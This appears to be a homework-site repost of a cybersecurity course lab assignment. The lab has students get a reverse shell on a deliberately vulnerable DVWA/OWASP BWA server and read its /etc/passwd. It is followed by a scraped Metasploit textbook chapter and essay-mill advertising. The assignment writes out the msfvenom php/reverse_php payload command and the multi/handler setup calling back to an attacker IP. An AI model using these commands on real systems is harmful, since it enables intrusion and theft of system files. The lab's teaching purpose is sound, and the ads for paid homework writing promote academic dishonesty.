09 Nov Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary.
Please follow the project Action Item and Provide
Take a screenshot of the terminal window showing the content of the passwd file.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed,
summarize, and interact with the content covered in this project. Summarize what you did as an
attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention
the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if
you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should
think and write critically, not just about what was presented but also what you have learned through the
session. You can ask questions for the things you're confused about. Questions asked here will be
summarized and answered anonymously in the next class.
Project-1: Getting a Reverse Shell
In this project, you are assigned the task of stealing /etc/passwd file of OWASP BWA computer in a CTF (Capture-the-Flag) event. You discovered that OWASP BWA has a vulnerable web application. First, you crack the password of the web application, and then you log in to the web application and try to exploit it in a way that allows you to steal the passwd file of the server on which this web app is running.
Reminder
Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting the project.
Computers
Notes:
1) You will perform all of your actions from Kali Linux.
2) You cannot copy and paste between your computer and the computers on Netlab environment; however, it will be both quicker and more reliable if you use your keyboard's tab key after writing the first 2-3 letters of each command/command parameters in Metasploit
3) Use CTRL – to shrink the fonts on Kali Linux terminal windows; alternatively you can click on the View menu and then the Shrink Font menu item.
Steps of Hacking
1. Optional: Crack the password of the admin user of the web application http://192.168.2.15/dvwa/login.php application. (This is the same lab you performed in Lab-7, Section-3)
2. Create a PHP backdoor (reverse PHP shell) by using msfvenom (A tool from Metasploit Framework)
3. Upload the PHP backdoor to the web application (Being able to upload a PHP is yet another vulnerability, easy to exploit, though. You will practice this local file upload vulnerability in detail in Lab-8, Section-2)
4. Prepare a handler on Kali Linux that will wait for the connection requests from the exploited web application and later on send commands to the same web application.
5. Call the reverse shell you uploaded (Open the PHP file on the browser on Kali)
6. Send a command to the vulnerable web application and fetch the /etc/passwd file of the OWASP BWA computer by sending a command (192.168.2.15)
The List of Actions/Commands per Step
|
1. Crack the password of the admin user of the web application |
|
|
This part is optional. If you want to practice is once more, see Lab-7, Section-3. This part has been included in the project for the sake of logical completeness. If this were a real hacking case, the hacker would have to perform this step before the upcoming steps. |
|
|
2. Create a PHP backdoor (reverse shell) |
|
|
Command |
Notes |
|
msfvenom -p php/reverse_php LHOST=192.168.2.10 LPORT=443 -f raw > reverseshell.php |
File created: reverseshell.php |
|
3. Upload PHP backdoor to the DVWA |
|
|
Find the link to upload a file from the left menu after logging into the web app using the cracked password. Refer to the Lab-8, Section-2 instructions to see the solution. |
|
|
4. Prepare a handler on Kali Linux |
|
|
A PHP reverse shell on its own does not allow you to connect to the remote server (OWASP BWA). There should be a corresponding handler that will respond to the connection request from the PHP reverse shell and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the frequency of the RC unit should be compatible with the frequency of the receiver in the car. Similarly, the parameter of the handler you are creating should be in full harmony with the parameters of the PHP shell. |
|
|
Commands |
Notes |
|
msfconsole |
This command opens the Metasploit Framework. |
|
search handler |
This is an informational command. Just try to find handler among search results |
|
use exploit/multi/handler |
Using a multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it is the reverseshell.php file) |
|
set payload php/reverse_php |
Using reverse_php payload for this handler. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
show options |
This is yet another informational command. To show the options of the payload |
|
set lhost 192.168.2.10 |
Option-1. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
set lport 443 |
Option-2. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
exploit |
Run handler |
|
5. Call the reverse shell |
|
|
After uploading the PHP file (in Step-3), the web application returned the path where the reverse shell has been uploaded. Copy that path and append to the URL in a meaningful way and hit enter. |
|
|
6. Send a command to the vulnerable web application and fetch the /etc/passwd file |
|
|
Switch to the terminal window where you run the handler by exploit command. If you uploaded the PHP file in Step-3 and then called the file in Step-5 accurately, the PHP has already opened a connection to the handler and been waiting for the handler's commands. You should also see the message of handler similar to "Command shell session 1 opened (192.168.2.10:443 -> 192.168.2.15:54585 at YYYY-MM-DD HH:MM:SS +Timezone)” If you see the message above, send the command to dump the /etc/passwd to the terminal window; there is a standard command in Linux called cat that writes the content of the files to the screen. |
Take a screenshot of the terminal window showing the content of the passwd file.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.
image6.png
image7.png
image1.png
image2.png
image3.png
image4.png
image5.png
,
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 1/51
Chapter 3: Metasploit Components and Environment Configuration For any tool that we use to perform a
particular task, it's always helpful to
know that tool inside out. A detailed un-
derstanding of the tool enables us to use
it appropriately, making it perform to the
fullest of its capability. Now that you
have learned some of the absolute basics
of the Metasploit Framework and how to
install it, in this chapter you will learn
how the Metasploit Framework is struc-
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 2/51
tured and the various components of the
Metasploit ecosystem.
The following topics will be covered in
this chapter:
Anatomy and structure of Metasploit
Metasploit components: auxiliaries, ex-
ploits, encoders, payloads, and post
Getting started with msfconsole and
common commands
Variables in Metasploit
Updating the Metasploit Framework
Technical requirements The following software is required:
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 3/51
Kali Linux
Metasploit Framework
Anatomy and structure of Metasploit The simplest method to learn the struc-
ture of Metasploit Framework is to
browse and explore through its applica-
tion directory. In Kali Linux, the
Metasploit Framework can be located at
/usr/share/metasploit-framework, as
shown in the following screenshot:
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 4/51
Figure 3.1 – Metasploit Framework
directory
At a broad level, the Metasploit
Framework structure is as shown in the
following screenshot:
Figure 3.2 – Metasploit Framework
Structure
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 5/51
We'll be using tools/utilities from each of
these categories as we progress through
the book.
In the next section, we'll have a brief
overview of all the Metasploit
components.
Metasploit components and environment configuration The Metasploit Framework has various
component categories based on their role
in the penetration testing phases. Each of
the component categories has various
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 6/51
modules and plugins that we can use in
the exploitation process.
The following sections will provide a de-
tailed understanding of what each com-
ponent category is responsible for.
Auxiliaries
You have learned so far that Metasploit is
a complete penetration testing frame-
work and not just a tool. When we call it
a framework, it means that it consists of
many useful tools and utilities. Auxiliary
modules in the Metasploit Framework
are nothing but small pieces of code that
are meant to perform a specific task (in
the scope of our penetration testing life
cycle). For example, you might need to
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 7/51
perform a simple task of verifying
whether a certificate of a particular
server has expired or not, or you might
want to scan your subnet and check
whether any of the FTP servers allow
anonymous access.
Such tasks can be very easily accom-
plished using the auxiliary modules
present in the Metasploit Framework.
There are more than 1,000 auxiliary
modules spread across 19 categories in
the Metasploit Framework.
The following table shows various cate-
gories of auxiliary modules present in
the Metasploit Framework:
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 8/51
Don't get overwhelmed with the number
of auxiliary modules present in the
Metasploit Framework. You may not
need to know each and every module in-
dividually. You just need to search for the
right module in the required context and
use it accordingly. We will now see how
to use an auxiliary module.
During the course of this book, we will
use many different auxiliary modules as
and when required; however, let's get
started with a simple example:
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 9/51
1. Open up a terminal window and start
Metasploit using the msfconsole
command.
2. Select the portscan/tcp auxiliary mod-
ule to perform a port scan against a tar-
get system.
3. Using the show command, list all the pa-
rameters that need to be configured in
order to run this auxiliary module.
4. Using the set RHOSTS command, set the
IP address of our target system.
5. Using the set PORTS command, select
the port range you want to scan on
your target system.
6. Using the run command, execute the
auxiliary module with the parameters
configured earlier.
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 10/51
You can see the use of all the previously
mentioned commands in the following
screenshot:
Figure 3.3 – Auxiliary TCP Port Scanner
Next, we will be covering payloads.
Payloads
To understand what a payload does, let's
consider a real-world example. A mili-
tary unit of a certain country develops a
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 11/51
new missile that can travel a range of 500
km at very high speed. Now, the missile is
of no use unless it's armed with the right
kind of ammunition. Now, the military
unit decided to load high explosive mate-
rial within the missile so that when the
missile hits the target, the explosive ma-
terial within the missile explodes and
causes the required damage to the en-
emy. In this case, the high explosive ma-
terial within the missile is the payload.
The payload can be changed based on the
severity of damage that is to be caused by
the missile.
Similarly, payloads in the Metasploit
Framework let us decide what action is
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 12/51
to be performed on the target system
once the exploit is successful.
Singles: These are sometimes also re-
ferred to as inline or non-staged pay-
loads. Payloads in this category are a
completely self-contained unit of the
exploit and require shellcode, which
means they have everything that is re-
quired to exploit the vulnerability on
the target. The disadvantage of such
payloads is their size. Since they con-
tain the complete exploit and shellcode,
they can be quite bulky at times, ren-
dering them useless in scenarios with
size restrictions.
Stagers: There are certain scenarios
where the size of the payload matters a
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 13/51
lot. A payload with even a single byte
extra may not function well on the tar-
get system. The stager's payload comes
in handy in such a situation. The
stager's payload simply sets up a con-
nection between the attacking system
and the target system. It doesn't have
the shellcode necessary to exploit the
vulnerability on the target system.
Being very small in size, it fits in well in
many scenarios.
Stages: Once the stager payload has set
up a connection between the attacking
system and the target system, the stages
payloads are then downloaded on the
target system. They contain the re-
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 14/51
quired shellcode to exploit the vulnera-
bility on the target system.
The following screenshot shows a sample
payload that can be used to obtain a re-
verse TCP shell from a compromised
Windows system:
Figure 3.4 – Reverse TCP Payload
You will be learning how to use various
payloads along with exploits, in the up-
coming chapters.
Exploits
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 15/51
Exploits are a crucial part of the
Metasploit Framework. An exploit is
nothing but the actual piece of code that
gives the required access to the target
system. There are more than 2,500 ex-
ploits spread across more than 19 cate-
gories based on platform supported by
exploit. Now, you might be thinking that,
out of so many available exploits, which
is the one that needs to be used? The de-
cision to use a particular exploit against a
target can be made only after extensive
enumeration and vulnerability assess-
ment of our target. (Refer to the section
penetration testing life cycle in Chapter 1,
Introduction to Metasploit and Supporting
Tools).
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 16/51
Proper enumeration and a vulnerability
assessment of the target will give us the
following information based on which
we can choose the correct exploit:
Operating system of the target system
(including exact version and
architecture)
Open ports on the target system
(Transmission Control Protocol (TCP)
and User Datagram Protocol (UDP)
Services along with versions running
on the target system
Probability of a particular service being
vulnerable
The following table shows the various
categories of exploits available in the
Metasploit Framework:
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 17/51
In the upcoming chapters, we'll see how
to use an exploit against a vulnerable tar-
get. Now, we will move ahead to under-
stand the use of encoders during
exploitation.
Encoders
In any real-world penetration testing sce-
nario, it's quite possible that our attempt
to attack the target system would be de-
tected by some kind of security software
present on the target system. This may
jeopardize all our efforts to gain access to
the remote system. This is exactly when
encoders come to the rescue. The job of
11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition
https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 18/51
the encoders is to obfuscate our exploit
and payload in such a way that, in the
target system, it goes unnoticed by all of
the security systems.
The following table shows the various en-
coder categories available in the
Metasploit Framework:
We'll be looking at encoders in more de-
tail in the upcoming chapters. We'll now
move ahead to understand use of NOPs
Our website has a team of professional writers who can help you write any of your homework. They will write your papers from scratch. We also have a team of editors just to make sure all papers are of HIGH QUALITY & PLAGIARISM FREE. To make an Order you only need to click Ask A Question and we will direct you to our Order Page at WriteDemy. Then fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.
Fill in all the assignment paper details that are required in the order form with the standard information being the page count, deadline, academic level and type of paper. It is advisable to have this information at hand so that you can quickly fill in the necessary information needed in the form for the essay writer to be immediately assigned to your writing project. Make payment for the custom essay order to enable us to assign a suitable writer to your order. Payments are made through Paypal on a secured billing page. Finally, sit back and relax.
About Wridemy
We are a professional paper writing website. If you have searched a question and bumped into our website just know you are in the right place to get help in your coursework. We offer HIGH QUALITY & PLAGIARISM FREE Papers.
How It Works
To make an Order you only need to click on “Order Now” and we will direct you to our Order Page. Fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.
Are there Discounts?
All new clients are eligible for 20% off in their first Order. Our payment method is safe and secure.